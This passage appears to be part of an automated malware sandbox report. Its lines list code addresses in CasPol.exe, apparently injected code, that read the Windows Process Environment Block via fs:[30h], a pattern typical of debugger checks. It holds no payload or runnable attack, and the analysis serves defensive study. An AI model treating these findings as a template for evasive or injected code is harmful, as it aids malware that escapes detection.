          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A309 mov eax, dword ptr fs:[00000030h]1_2_0164A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E131B mov eax, dword ptr fs:[00000030h]1_2_016E131B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016503E2 mov eax, dword ptr fs:[00000030h]1_2_016503E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164DBE9 mov eax, dword ptr fs:[00000030h]1_2_0164DBE9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D23E3 mov ecx, dword ptr fs:[00000030h]1_2_016D23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D23E3 mov ecx, dword ptr fs:[00000030h]1_2_016D23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D23E3 mov eax, dword ptr fs:[00000030h]1_2_016D23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A53CA mov eax, dword ptr fs:[00000030h]1_2_016A53CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A53CA mov eax, dword ptr fs:[00000030h]1_2_016A53CA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654BAD mov eax, dword ptr fs:[00000030h]1_2_01654BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654BAD mov eax, dword ptr fs:[00000030h]1_2_01654BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654BAD mov eax, dword ptr fs:[00000030h]1_2_01654BAD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F5BA5 mov eax, dword ptr fs:[00000030h]1_2_016F5BA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E138A mov eax, dword ptr fs:[00000030h]1_2_016E138A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01631B8F mov eax, dword ptr fs:[00000030h]1_2_01631B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01631B8F mov eax, dword ptr fs:[00000030h]1_2_01631B8F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DD380 mov ecx, dword ptr fs:[00000030h]1_2_016DD380
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652397 mov eax, dword ptr fs:[00000030h]1_2_01652397
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165B390 mov eax, dword ptr fs:[00000030h]1_2_0165B390
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DB260 mov eax, dword ptr fs:[00000030h]1_2_016DB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016DB260 mov eax, dword ptr fs:[00000030h]1_2_016DB260
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F8A62 mov eax, dword ptr fs:[00000030h]1_2_016F8A62
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0166927A mov eax, dword ptr fs:[00000030h]1_2_0166927A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629240 mov eax, dword ptr fs:[00000030h]1_2_01629240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629240 mov eax, dword ptr fs:[00000030h]1_2_01629240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629240 mov eax, dword ptr fs:[00000030h]1_2_01629240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01629240 mov eax, dword ptr fs:[00000030h]1_2_01629240
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EEA55 mov eax, dword ptr fs:[00000030h]1_2_016EEA55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016B4257 mov eax, dword ptr fs:[00000030h]1_2_016B4257
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01664A2C mov eax, dword ptr fs:[00000030h]1_2_01664A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01664A2C mov eax, dword ptr fs:[00000030h]1_2_01664A2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164A229 mov eax, dword ptr fs:[00000030h]1_2_0164A229
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01638A0A mov eax, dword ptr fs:[00000030h]1_2_01638A0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01625210 mov eax, dword ptr fs:[00000030h]1_2_01625210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01625210 mov ecx, dword ptr fs:[00000030h]1_2_01625210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01625210 mov eax, dword ptr fs:[00000030h]1_2_01625210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01625210 mov eax, dword ptr fs:[00000030h]1_2_01625210
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162AA16 mov eax, dword ptr fs:[00000030h]1_2_0162AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162AA16 mov eax, dword ptr fs:[00000030h]1_2_0162AA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01643A1C mov eax, dword ptr fs:[00000030h]1_2_01643A1C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EAA16 mov eax, dword ptr fs:[00000030h]1_2_016EAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EAA16 mov eax, dword ptr fs:[00000030h]1_2_016EAA16
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652AE4 mov eax, dword ptr fs:[00000030h]1_2_01652AE4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E4AEF mov eax, dword ptr fs:[00000030h]1_2_016E4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652ACB mov eax, dword ptr fs:[00000030h]1_2_01652ACB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016252A5 mov eax, dword ptr fs:[00000030h]1_2_016252A5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163AAB0 mov eax, dword ptr fs:[00000030h]1_2_0163AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163AAB0 mov eax, dword ptr fs:[00000030h]1_2_0163AAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165FAB0 mov eax, dword ptr fs:[00000030h]1_2_0165FAB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165D294 mov eax, dword ptr fs:[00000030h]1_2_0165D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165D294 mov eax, dword ptr fs:[00000030h]1_2_0165D294
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164C577 mov eax, dword ptr fs:[00000030h]1_2_0164C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164C577 mov eax, dword ptr fs:[00000030h]1_2_0164C577
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01663D43 mov eax, dword ptr fs:[00000030h]1_2_01663D43
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A3540 mov eax, dword ptr fs:[00000030h]1_2_016A3540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D3D40 mov eax, dword ptr fs:[00000030h]1_2_016D3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01647D50 mov eax, dword ptr fs:[00000030h]1_2_01647D50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0162AD30 mov eax, dword ptr fs:[00000030h]1_2_0162AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01633D34 mov eax, dword ptr fs:[00000030h]1_2_01633D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EE539 mov eax, dword ptr fs:[00000030h]1_2_016EE539
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F8D34 mov eax, dword ptr fs:[00000030h]1_2_016F8D34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016AA537 mov eax, dword ptr fs:[00000030h]1_2_016AA537
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654D3B mov eax, dword ptr fs:[00000030h]1_2_01654D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654D3B mov eax, dword ptr fs:[00000030h]1_2_01654D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01654D3B mov eax, dword ptr fs:[00000030h]1_2_01654D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163D5E0 mov eax, dword ptr fs:[00000030h]1_2_0163D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0163D5E0 mov eax, dword ptr fs:[00000030h]1_2_0163D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EFDE2 mov eax, dword ptr fs:[00000030h]1_2_016EFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EFDE2 mov eax, dword ptr fs:[00000030h]1_2_016EFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EFDE2 mov eax, dword ptr fs:[00000030h]1_2_016EFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016EFDE2 mov eax, dword ptr fs:[00000030h]1_2_016EFDE2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016D8DF1 mov eax, dword ptr fs:[00000030h]1_2_016D8DF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6DC9 mov eax, dword ptr fs:[00000030h]1_2_016A6DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6DC9 mov eax, dword ptr fs:[00000030h]1_2_016A6DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6DC9 mov eax, dword ptr fs:[00000030h]1_2_016A6DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6DC9 mov ecx, dword ptr fs:[00000030h]1_2_016A6DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6DC9 mov eax, dword ptr fs:[00000030h]1_2_016A6DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6DC9 mov eax, dword ptr fs:[00000030h]1_2_016A6DC9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F05AC mov eax, dword ptr fs:[00000030h]1_2_016F05AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F05AC mov eax, dword ptr fs:[00000030h]1_2_016F05AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016535A1 mov eax, dword ptr fs:[00000030h]1_2_016535A1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01651DB5 mov eax, dword ptr fs:[00000030h]1_2_01651DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01651DB5 mov eax, dword ptr fs:[00000030h]1_2_01651DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01651DB5 mov eax, dword ptr fs:[00000030h]1_2_01651DB5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652581 mov eax, dword ptr fs:[00000030h]1_2_01652581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652581 mov eax, dword ptr fs:[00000030h]1_2_01652581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652581 mov eax, dword ptr fs:[00000030h]1_2_01652581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01652581 mov eax, dword ptr fs:[00000030h]1_2_01652581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01622D8A mov eax, dword ptr fs:[00000030h]1_2_01622D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01622D8A mov eax, dword ptr fs:[00000030h]1_2_01622D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01622D8A mov eax, dword ptr fs:[00000030h]1_2_01622D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01622D8A mov eax, dword ptr fs:[00000030h]1_2_01622D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01622D8A mov eax, dword ptr fs:[00000030h]1_2_01622D8A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2D82 mov eax, dword ptr fs:[00000030h]1_2_016E2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2D82 mov eax, dword ptr fs:[00000030h]1_2_016E2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2D82 mov eax, dword ptr fs:[00000030h]1_2_016E2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2D82 mov eax, dword ptr fs:[00000030h]1_2_016E2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2D82 mov eax, dword ptr fs:[00000030h]1_2_016E2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2D82 mov eax, dword ptr fs:[00000030h]1_2_016E2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E2D82 mov eax, dword ptr fs:[00000030h]1_2_016E2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165FD9B mov eax, dword ptr fs:[00000030h]1_2_0165FD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165FD9B mov eax, dword ptr fs:[00000030h]1_2_0165FD9B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0164746D mov eax, dword ptr fs:[00000030h]1_2_0164746D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165AC7B mov eax, dword ptr fs:[00000030h]1_2_0165AC7B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165A44B mov eax, dword ptr fs:[00000030h]1_2_0165A44B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BC450 mov eax, dword ptr fs:[00000030h]1_2_016BC450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016BC450 mov eax, dword ptr fs:[00000030h]1_2_016BC450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0165BC2C mov eax, dword ptr fs:[00000030h]1_2_0165BC2C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6C0A mov eax, dword ptr fs:[00000030h]1_2_016A6C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6C0A mov eax, dword ptr fs:[00000030h]1_2_016A6C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6C0A mov eax, dword ptr fs:[00000030h]1_2_016A6C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016A6C0A mov eax, dword ptr fs:[00000030h]1_2_016A6C0A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F740D mov eax, dword ptr fs:[00000030h]1_2_016F740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F740D mov eax, dword ptr fs:[00000030h]1_2_016F740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016F740D mov eax, dword ptr fs:[00000030h]1_2_016F740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_016E1C06 mov eax, dword ptr fs:[00000030h]1_2_016E1C06
